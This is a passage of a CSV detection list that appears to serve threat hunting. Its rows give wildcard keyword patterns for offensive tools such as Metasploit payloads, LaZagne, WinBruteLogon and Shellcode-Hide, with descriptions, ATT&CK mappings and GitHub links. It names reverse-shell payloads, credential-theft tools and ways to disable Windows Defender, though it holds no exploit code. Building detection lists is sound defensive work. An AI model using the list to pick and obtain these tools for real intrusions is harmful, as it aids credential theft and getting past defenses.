potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Win64.Lazagne*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*Win64/IceId*,signature_keyword,Antivirus Signature,antivirus signatures,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Win64/Mikatz*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,mimikatz signatures,10,10,N/A,N/A,N/A,N/A -*Win7Elevate.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Win7ElevateDll.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*WinBruteLogon* -v -u*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,0,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*WinBruteLogon.dpr*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*WinBruteLogon.dproj*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*WinBruteLogon.exe*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*WinBruteLogon.res*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*WinCreds.exe*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*windapsearch --dc *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*windapsearch.py*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/ropnop/windapsearch,1,1,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -*windapsearch_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*windapsearch_py2.py*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/ropnop/windapsearch,1,1,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -*windapsearch-master*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/ropnop/windapsearch,1,1,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -*WinDefenderKiller*,offensive_tool_keyword,WinDefenderKiller,Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys,T1562.001 - T1055.002 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/S12cybersecurity/WinDefenderKiller,1,1,N/A,10,4,327,47,2023-07-27T11:06:24Z,2023-07-25T10:32:25Z -*winDefKiller.exe*,offensive_tool_keyword,WinDefenderKiller,Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys,T1562.001 - T1055.002 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/S12cybersecurity/WinDefenderKiller,1,1,N/A,10,4,327,47,2023-07-27T11:06:24Z,2023-07-25T10:32:25Z -*WindfarmDynamite.cdproj*,offensive_tool_keyword,WindfarmDynamite,WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread),T1055.013 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*WindfarmDynamite.exe*,offensive_tool_keyword,WindfarmDynamite,WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread),T1055.013 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*WindfarmDynamite.sln*,offensive_tool_keyword,WindfarmDynamite,WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread),T1055.013 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*Windows Exploit*,offensive_tool_keyword,_,windows exploit keyword often used in poc exploit github repo or could be a file name or folder,T1068 - T1070 - T1071 - T1078 - T1085 - T1090 - T1105 - T1112 - T1134 - T1135 - T1136 - T1203 - T1210 - T1211 - T1218 - T1222 - T1247 - T1499 - T1505 - T1526 - T1547 - T1548 - T1550 - T1553 - T1574 - T1583 - T1584 - T1587 - T1588 - T1590 - T1591 - T1592 - T1596 - T1600,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*windows*lsa_secrets.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*Windows.Hacktool.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*windows/c_payload_util*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Windows/lazagne.spec*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*windows/shell_reverse_tcp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*windows/x64/meterpreter_reverse_tcp*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,1,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*windows_agent/asm/x64/alter_pe_sections*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_agent/asm/x86/alter_pe_sections*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_agent/dll_main.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_agent/exe_main.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_agent/win_*.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_agent/win_named_pipe.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_agent/win_shell.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_autologin.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*windows_console_interceptor*dll_main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_console_interceptor*exe_main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_console_interceptor*interceptor.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_credentials.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*windows_key.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*windows_recon.bat*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*windows_sam_hivenightmare.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*windows_sam_hivenightmare.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*windows10_ntfs_crash_dos*,offensive_tool_keyword,POC,PoC for a NTFS crash that I discovered. in various Windows versions Type of issue: denial of service. One can generate blue-screen-of-death using a handcrafted NTFS image. This Denial of Service type of attack. can be driven from user mode. limited user account or Administrator. It can even crash the system if it is in locked state.,T1499.002 - T1059.001 - T1538.002,TA0002 - TA0007 - TA0008,N/A,N/A,DDOS,https://github.com/mtivadar/windows10_ntfs_crash_dos,1,1,N/A,N/A,6,589,137,2020-04-28T18:11:52Z,2018-04-27T19:31:59Z -*Windows7-BypassLogon-Screen.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*WindowsEnum -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-WinEnum.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*WindowsExploits*,offensive_tool_keyword,Exploits,A curated archive of complied and tested public Windows exploits.,T1213 - T1210 - T1188 - T1055,TA0001 - TA0009 - TA0008,N/A,N/A,Exploitation tools,https://github.com/WindowsExploits/Exploits,1,1,N/A,N/A,10,1212,565,2020-05-29T19:09:52Z,2017-06-05T15:39:22Z -*windows-exploit-suggester.*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*windows-forkbomb.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*WindowsLies*BlockWindows*,offensive_tool_keyword,BlockWindows,Stop Windows 7 through 10 Nagging and Spying updates. Tasks. IPs. and services. Works with Windows 7 through 10,T1059 - T1562 - T1053 - T1543,TA0002 - TA0003 - TA0004 - TA0008,N/A,N/A,Defense Evasion,https://github.com/WindowsLies/BlockWindows,1,1,N/A,N/A,7,644,109,2020-04-11T15:38:12Z,2015-08-26T01:17:57Z -*Windows-Post-Exploitation*,offensive_tool_keyword,Windows-Post-Exploitation,Windows Post Exploitation list of tools on github. could also be related to folder name,T1021 - T1059 - T1078 - T1056 - T1028 - T1053 - T1003,TA0002 - TA0003 - TA0004 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/emilyanncr/Windows-Post-Exploitation,1,1,N/A,N/A,5,491,122,2021-09-20T01:47:13Z,2017-11-18T04:16:41Z -*windows-privesc-check*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*Windows-Privilege-Escalation*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*WindowsShareFinder.cs*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*winexec.notepad.raw*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*WinhttpShellcode.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*WinhttpShellcode.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*WinhttpShellcode.sln*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*WinhttpShellcode.vcxproj*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*Win-Ops-Master.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 